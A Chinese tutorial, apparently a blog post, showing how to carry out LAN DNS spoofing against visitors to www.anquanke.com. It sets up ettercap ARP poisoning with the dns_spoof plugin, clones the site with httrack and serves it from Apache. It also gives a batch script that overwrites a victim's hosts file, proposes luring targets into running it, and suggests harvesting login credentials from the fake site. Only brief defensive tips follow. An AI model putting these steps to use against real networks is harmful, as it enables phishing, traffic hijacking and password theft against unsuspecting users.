DNS服务器记录域名所对应的ip,全球总共有13个根域名服务器。
以访问www.anquanke.com为例
理论基础
在浏览器的搜索栏输入www.anquanke.com
1.先查询本地host文件,检测www.anquanke.com有没有对应ip,如果有,直接访问ip,否则进行后续步骤
2.浏览器然后向DNS服务器(网关或者真正的DNS服务器)发送一个包
3.DNS服务器返回对应的ip地址
3.浏览器去访问对应ip
环境
默认网关:192.168.230.2
攻击者ip:192.168.230.128
示例局域网中主机ip:192.168.230.133
同一局域网dns欺骗
未开始攻击,目标主机
image.png
开始攻击
攻击方设置
修改etter.dns文件
vi /etc/ettercap/etter.dns
域名 A 对应的ip地址
tips
如果域名设置为*,则将所有的解析被解析为对应ip
容易暴露身份。
image.png
克隆网站
kali中的httrack一顿回车操作,而且比windows的工具好用多了。
直接命令行输入httrack
无奈安全客的网站克隆的一部分,整个网站太大了,这里仅以举例说明...
image.png
image.png
image.png
image.png
啧啧啧。
在网站目录下将文件拷贝
root@kali:~/websites/anquanke# cp -r * /var/www/html
启动Apache服务
/etc/init.d/apache2 start
启动ettercap
ettercap -G
具体步骤这里不说了,中间人攻击里面有的。
Sniff->unified *->eth0->OK
Hosts->scan*主机扫描
Host List->网关(只需要选定网关就好了)
192.168.230.2 Add to Target 2
Mitm->ARP pos*
上述都做完以后
Plugin->Manege the plugins
双击dns_spoof
image.png
start->start sniffing
同一局域网内的其他主机
访问www.anquanke.com网站,可以看到如下:
image.png
然后显示不全的原因是安全客整个网站太大了,很多规则都没有克隆,另外一方面浏览器版本太低。
点击其中的一个文章,比如点击这篇文章
image.png
image.png
image.png
image.png
可以看到,如果给与足够的时间克隆整个网站,受骗者将会很难以区分是否是真实网站。
dns欺骗的扩展利用
欺骗用户修改host
修改host的文件代码.bat,可以批量添加域名,这里也可以用其他的方式,比如exe文件等,美女图片等等吸引目标点击,本菜这里为了方便,就使用bat了。
set ip=192.168.230.128(攻击者ip/公网可以访问的ip)
set hosts="c:\WINDOWS\system32\drivers\etc\hosts"
echo %ip% www.anquanke.com>%hosts%
在目标主机运行了添加host的bat后,剩余操作和上述类似,即可完成DNS扩展利用。
tips
可以在登录等重要的地方背后添加跳转到正确界面
截取登录用户的用户名和密码
这个懂一些编程语言的同鞋应该很容易做到
本菜这里就不演示了。
tips
本菜这里对目录中的路径没有做修改,所以url会出现两个www.anquanke.com
这里也是新手容易忽视的地方,不过可以简单的修改文件路径。
DNS欺骗的防治
1.在C盘根目录的autoexec.bat中输入绑定IP和MAC到网关的命令可以实现开机自动绑定
2.在路由中绑定MAC和IP
3.安装ARP防火墙或者网络防火墙
